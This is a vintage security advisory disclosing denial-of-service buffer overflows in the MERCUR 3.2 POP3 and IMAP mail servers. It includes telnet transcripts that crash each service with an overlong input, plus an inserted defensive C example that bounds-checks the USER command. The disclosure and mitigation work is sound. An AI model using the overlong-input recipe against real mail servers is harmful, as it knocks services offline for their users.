USSR Advisory #35 - Remote / local DoS overflow attack in MERCUR v3.2* Mail server, POP server, and IMAP server for Windows.
bc50ab174effe6cc371148796eba9cfd01035cb4c4caf8c073146c2acef6a2f4
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Local / Remote Multiple DoS Attacks in MERCUR v3.2* for Windows 98/NT Vulnerability
USSR Advisory Code: USSR-2000035
Release Date:
March 15, 2000
Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for Windows 98/NT
MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT
THE PROBLEM
UssrLabs found multiple places in MERCUR v3.20.* where the software does
not perform proper bounds checking.
Each of the following results in a Denial of Service against the service
in question.
Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:30:39 -0300
user (buffer)
Where (buffer) is approx. 2000 characters.
[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:34:09 -0300
(buffer)
Where (buffer) is approx. 3000 characters.
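The kind of bounds check the POP3 session above shows to be missing, as an added example written for this page (it is not MERCUR source code and not from UssrLabs). The handler name pop3_parse_user, the constants and the return codes are assumptions; the limits are the 255-octet command line of RFC 2449 and the 40-character argument of RFC 1939.

```c
/* Added example: hypothetical POP3 USER handler, not MERCUR source code. */
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

#define POP3_MAX_LINE 255  /* RFC 2449: max command length, CRLF included */
#define POP3_MAX_ARG   40  /* RFC 1939: max length of a single argument */

enum pop3_rc { POP3_OK = 0, POP3_ERR_TOO_LONG, POP3_ERR_SYNTAX };

/* Unchecked pattern, for contrast: strcpy(name, line + 5) lets the peer
 * choose the copy length. Below, every length is checked before the copy. */
enum pop3_rc pop3_parse_user(const char *line, size_t len,
                             char *name, size_t name_sz)
{
    const char *arg;
    size_t arg_len;

    if (len > POP3_MAX_LINE)              /* cap the raw line first */
        return POP3_ERR_TOO_LONG;
    if (len < 2 || line[len - 2] != '\r' || line[len - 1] != '\n')
        return POP3_ERR_SYNTAX;           /* must end in CRLF */
    len -= 2;
    if (len < 6 || strncasecmp(line, "USER ", 5) != 0)
        return POP3_ERR_SYNTAX;           /* keyword, one space, >= 1 byte */
    arg = line + 5;
    arg_len = len - 5;
    if (arg_len > POP3_MAX_ARG || arg_len >= name_sz)
        return POP3_ERR_TOO_LONG;         /* protocol and destination bounds */
    if (memchr(arg, '\0', arg_len) || memchr(arg, ' ', arg_len))
        return POP3_ERR_SYNTAX;           /* policy here: no NUL or extra space */
    memcpy(name, arg, arg_len);
    name[arg_len] = '\0';
    return POP3_OK;
}

int main(void)
{
    char name[POP3_MAX_ARG + 1];
    char big[5 + 2000 + 2 + 1];           /* constructed: "USER " + 2000 'A' + CRLF */

    memcpy(big, "USER ", 5);
    memset(big + 5, 'A', 2000);
    memcpy(big + 2005, "\r\n", 3);
    printf("short=%d long=%d\n",
           pop3_parse_user("USER alice\r\n", 12, name, sizeof name),
           pop3_parse_user(big, 2007, name, sizeof name));
    return 0;
}
```

The function validates a line that is already in memory; the socket reader that fills that buffer has to stop at POP3_MAX_LINE bytes as well, or the overflow simply moves one layer down.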
Binary or source for this Exploit:
http://www.ussrback.com/
Exploit:
The exploit crashes the POP3 and IMAP services on the remote machine.
Vendor Status:
informed
Vendor Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/mercur_e.html
Credit: USSRLABS
SOLUTION
Nothing yet.
Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and
Wiretrip.
u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
http://www.ussrback.com
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>
iQA/AwUBONAIJ6VRYEYcg938EQL/AgCg39j7B6rQSXUNK/MQkxlDEmg6WCQAnRey
+gdnd/4H3zK18gDRuZ/TlrzV
=UYs9
-----END PGP SIGNATURE-----